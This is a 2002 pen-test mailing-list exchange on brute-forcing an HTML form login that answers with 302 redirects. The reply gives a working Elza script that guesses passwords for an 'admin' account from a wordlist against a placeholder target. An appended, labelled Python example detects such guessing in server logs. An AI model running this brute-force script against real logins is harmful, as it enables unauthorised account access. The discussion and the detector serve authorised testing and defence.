Penetration Testing mailing list archives
RE: Password HTML form bruteforce
From: "Greg" <greg () hoobie net>
Date: Sat, 20 Apr 2002 02:05:16 +0100
I'm afraid Brutus doesn't handle 302's correctly. Dodgy coding if you ask me. Why don't you try Elza (http://online.securityfocus.com/tools/1127) with this script which is based on one found in the Elza docs. Obviously change the target url and username. This script will read each string from words.txt and submit each attempt checking for the

var autoredir = on
subst ACCOUNT = admin

proc POSITIVEAUTH
print Positive Authentication with Login: ACCOUNT, Password: CURRPASS
endproc POSITIVEAUTH

proc ATTEMPTAUTH
field userid = USERSTRING
field password = PASSSTRING
# Add any other form fields that need to be sent here
post url http://TargetAddress/Login.cfm
call POSITIVEAUTH if body = Some warm glowing message about how you're logged in now.
endproc ATTEMPTAUTH

call ATTEMPTAUTH PASSSTRING % words.txt

In the above script, if you set 'autoredir' to off you will not be automatically redirected by the 302 and the '%location%' variable will be made available to you for examination. It might be easier to just let Elza handle the redirection and then match some known test in the body of the successful authentication page as shown above.

Read the docs for Elza, you'll need to build a list of scripts up before it becomes really useful.

cheers
Greg
-----Original Message-----
From: joh ket [mailto:johket () hotmail com]
Sent: 18 April 2002 10:16
To: pen-test () securityfocus com
Subject: Password HTML form bruteforce

Hi there,

I am currently involved in a pen test on a website which is using formbased authentication. I figured out that an account, named 'test' exists... (...)

Now I want to brute force this account, I am using Brutus AET2 for this. But I do not know how to use the HTML response. Below the packet capture of a response of a login which was successful:

HTTP/1.1.302.Object.Moved..Location:.start.cfm?cid=
(lines deleted)
<head><title>Document.Moved</title></head><body<h1>Object.Moved</h1>This.document.may.be.found.<a.HREF="start.cfm? cid=
(lines deleted)

A capture of an unsuccessful capture looks like this:

HTTP/1.1.302.Object.Moved..Location:.original.cfm? login=Invalid password. Please try again
(lines deleted)
Document.Moved</title></head>.<body><h1>Object. Moved</h1>This.document.may.be.found.<a.HREF=" original.cfm?login=Invalid password. Please try again">here</a>

So depending on the password I get redirected to a page... How should the primary and the secondary response be configured? Or does somebody else have a better idea how to do this?

Thanks in advance!
Joh Ket

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
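Added example, not part of the original posts: because the login outcome is visible only in the 302 Location target (start.cfm?cid= on success, original.cfm?login=Invalid password on failure), a defender can detect guessing against this form from server-side logs that record that header. The log format, client addresses, cid values, threshold and window below are constructed assumptions; /Login.cfm is the placeholder path from the script above.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Redirect targets taken from the two captures in the thread.
FAIL_MARK = "original.cfm?login=Invalid password"
OK_MARK = "start.cfm?cid="

# Constructed sample log (assumed format, Location header logged last):
# "<ISO time> <client> <method> <path> <status> <Location>"
_FAIL = FAIL_MARK + ". Please try again"
SAMPLE_LOG = "\n".join(
    ["2002-04-18T10:15:30 198.51.100.9 POST /Login.cfm 302 " + _FAIL,
     "2002-04-18T10:15:40 198.51.100.9 POST /Login.cfm 302 start.cfm?cid=1"]
    + [f"2002-04-18T10:16:{s:02d} 203.0.113.7 POST /Login.cfm 302 {_FAIL}"
       for s in range(1, 7)]
    + ["2002-04-18T10:16:07 203.0.113.7 POST /Login.cfm 302 start.cfm?cid=2"]
)

def classify(status, location):
    """Map a login response to 'fail', 'ok' or 'other' by its redirect target."""
    if status == "302" and location.startswith(FAIL_MARK):
        return "fail"
    if status == "302" and location.startswith(OK_MARK):
        return "ok"
    return "other"

def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return (client, alert, time) tuples for failure bursts and later successes."""
    recent = defaultdict(deque)   # client -> times of recent failed logins
    flagged, alerts = set(), []
    for line in log_text.splitlines():
        parts = line.split(" ", 5)
        if len(parts) != 6 or parts[2] != "POST" or not parts[3].endswith("/Login.cfm"):
            continue              # not a login submission, or malformed line
        ts, client, _, _, status, location = parts
        when = datetime.fromisoformat(ts)
        outcome = classify(status, location)
        failures = recent[client]
        while failures and when - failures[0] > window:
            failures.popleft()    # drop failures older than the window
        if outcome == "fail":
            failures.append(when)
            if len(failures) >= threshold and client not in flagged:
                flagged.add(client)
                alerts.append((client, "bruteforce", ts))
        elif outcome == "ok" and client in flagged:
            alerts.append((client, "login-after-bruteforce", ts))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The second alert type, a success redirect from a client already flagged for a failure burst, is the one to triage first, since it suggests a guessed password.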